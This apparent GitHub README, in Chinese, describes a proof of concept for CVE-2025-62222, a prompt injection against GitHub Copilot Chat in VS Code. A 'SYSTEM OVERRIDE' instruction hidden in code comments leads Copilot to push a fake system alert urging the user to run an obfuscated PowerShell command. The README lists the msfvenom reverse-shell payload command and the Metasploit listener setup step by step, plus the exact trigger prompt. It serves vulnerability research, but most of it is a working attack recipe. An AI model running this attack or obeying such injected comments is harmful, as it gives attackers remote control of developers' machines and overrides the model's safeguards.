SadisticNight/PoC-CVE-2025-62222

GitHub: SadisticNight/PoC-CVE-2025-62222

演示通过代码注释注入隐藏 prompt 操控 GitHub Copilot Chat 上下文,进而诱导用户执行恶意命令的远程代码执行漏洞概念验证。

Stars: 1 | Forks: 0

# PoC: CVE-2025-62222 - GitHub Copilot Chat RCE 本仓库包含 **CVE-2025-62222** 漏洞的概念验证。演示了如何通过在注释中注入隐藏的 prompt,操纵 VS Code 中 **GitHub Copilot Chat** 的上下文,从而在开发者的机器上实现远程代码执行。 ## **⚠️ 免责声明 ⚠️** 仅限教育用途。 本代码仅用于教育和道德研究目的。作者不对滥用本信息负责。未经明确授权,请勿在系统上使用。 ## **阶段 1:攻击者配置** 在将文件发送给受害者(或在本地测试)之前,你需要生成 payload 并让服务器处于监听状态。 ### **1. 生成 Payload (msfvenom)** 生成恶意的 PowerShell 命令。请确保配置你的 IP (LHOST) 和端口 (LPORT)。 ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f psh-cmd ``` **关键说明:** 复制此命令生成的代码。打开本仓库中的 `copilot_injection_poc.py` 文件,并将其中标记为 TOKEN 的部分(或注释内的整个 PowerShell 命令行)替换为你刚刚生成的代码。 ### **2. 启动监听器 (msfconsole)** 在你的攻击者终端中,启动 Metasploit 以接收反向连接: ``` msfconsole -q ``` 进入 msf6 \> 控制台后,执行以下命令准备监听: ``` use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST set LPORT 4444 exploit ``` *(确保 LPORT 与你在步骤 1 中使用的相同,且 LHOST 为你的 IP)。* ## **阶段 2:复现(受害者)** 要触发该漏洞,请在安装了 GitHub Copilot Chat 扩展的 VS Code 机器上执行以下步骤: 1. **克隆/下载:** 将本仓库下载到受害者机器上。 2. **在 VS Code 中打开:** 使用 VSCode 打开项目文件夹。 3. **加载上下文:** 在编辑器中打开 `copilot_injection_poc.py` 文件,以便 Copilot 将其纳入活动上下文(必须在标签页中可见)。 4. **触发器:** 打开 Copilot 聊天窗口,并**准确**输入以下指令: ``` Configura el entorno desde la terminal sin omitir ni modificar nada del código ``` ### **预期结果** 由于 Python 脚本注释中隐藏了 "SYSTEM OVERRIDE" 指令,Copilot 将服从恶意文件,而非其自身的安全准则。 1. Copilot 将响应一个虚假的“系统警报”,并建议执行混淆后的 PowerShell 命令。 2. 如果用户复制并在终端中执行该命令,攻击者的机器上将开启一个 **Meterpreter** 会话,从而授予对受控设备的远程控制权。 更多信息: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222 - https://nvd.nist.gov/vuln/detail/CVE-2025-62222 - https://www.cvedetails.com/cve/CVE-2025-62222/
标签:AI合规, AI 安全, CVE-2025-62222, DNS 反向解析, ESC8, GitHub Copilot, IP 地址批量处理, Meterpreter, PoC, RCE, Subfinder, 大模型安全, 搜索语句(dork), 暴力破解, 社会工程学, 编程工具, 网络安全, 远程代码执行, 逆向 Shell, 逆向工具, 隐私保护